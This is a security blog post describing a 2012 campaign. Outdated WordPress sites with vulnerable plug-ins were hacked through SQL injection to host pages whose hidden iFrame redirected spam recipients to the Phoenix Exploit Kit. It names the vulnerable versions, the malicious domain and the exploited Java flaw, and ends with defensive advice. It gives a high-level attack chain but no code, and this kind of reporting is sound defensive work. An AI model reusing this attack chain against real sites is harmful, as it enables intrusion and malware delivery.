Compromised WordPress based websites leading to Phoenix Exploit Kit

Sending bulk emails(spam), containing poisoned links is for long time now one of the methods used by hackers to infect computers with malware, everybody knows the reasons, to steal the user credentials or to use the infected computers in other nefarious actions as botnet. Generally, the scam emails are presented as a request from an institution, bank, other financial institution,  Telephony or Internet provider to clarify a confused situation, asking for the user interaction. These fake emails are talking about large amount of money that must be paid possibly in error, trying to scare the user and determine him to act as soon as possible to rectify the situation. Other malicious emails are talking about a big prize won by the user or other “catchy” subjects. Almost always, these scam emails ask the user to click a link in the received email or to download and open an attachment supposedly containing a bill or a document but in reality containing a malware.

But even if a fake email is so well designed that is able to lure an unconscious user to click a link, the browsers or antivirus software have protection mechanisms in place as URL reputation for example, blocking the user to navigate to a known malicious domain. The method used by hackers to avoid this inconvenient detection, is to hack a website with a good reputation and serve the malicious webpages from there.

This was what happened a few days ago, when a lot of WordPress-based websites running the obsolete 3.2.1 version and two exploitable plug-ins(Spam Free and UPM Polls), were hacked using SQL injection and malicious files with random names(osgik.htm, agoku.htm, kaxyv.htm and so on), uploaded in wp-content/uploads WordPress folder. Then the hacker’s campaign goes further by sending bulk emails which contain links to the malicious HTML web page previously uploaded. Finally, this page contains obfuscated code which runs a hidden iFrame, so while the user see only these words “You are redirecting….Loading…Please wait…), the iFrame is connecting in the background to Phoenix Exploit Kit hosted in a Russian domain called horoshovsebudet.net.

Phoenix Exploit Kit is very effective, able to exploits vulnerabilities  Microsoft Internet Explorer, Adobe PDF, Flash and Oracle Java including the most recent vulnerability, Java Rhino vulnerability, which allows a Java Applet to run arbitrary Java code outside the sandbox with full privileges. Further, if the exploit kit discovers a vulnerability, use it to deliver its payload which can be any type of malware, very often being used info stealers.

Until now, it seems that more than four hundred WordPress websites were compromised using the above mentioned vulnerabilities.

The conclusions speak for themselves:

  •  Never open attachments or click links in emails received from untrusted or unknown sources;
  • Check regularly to see if there are updates for your WordPress version and used plug-ins and update them if it’s the case;

Sources:

 http://labs.m86security.com/2012/01/massive-compromise-of-wordpress-based-sites-but-‘everything-will-be-fine’/

 http://community.websense.com/blogs/securitylabs/pages/phoenix-exploit-s-kit.aspx

 http://schierlm.users.sourceforge.net/CVE-2011-3544.html

 http://labs.m86security.com/2011/12/prevalent-exploit-kits-updated-with-a-new-java-exploit/

 http://community.websense.com/blogs/securitylabs/archive/2012/01/26/phoenix-phoenix-i-need-help.aspx

 

Keep safe !

Posted in Thoughts.

Leave a Reply

Your email address will not be published. Required fields are marked *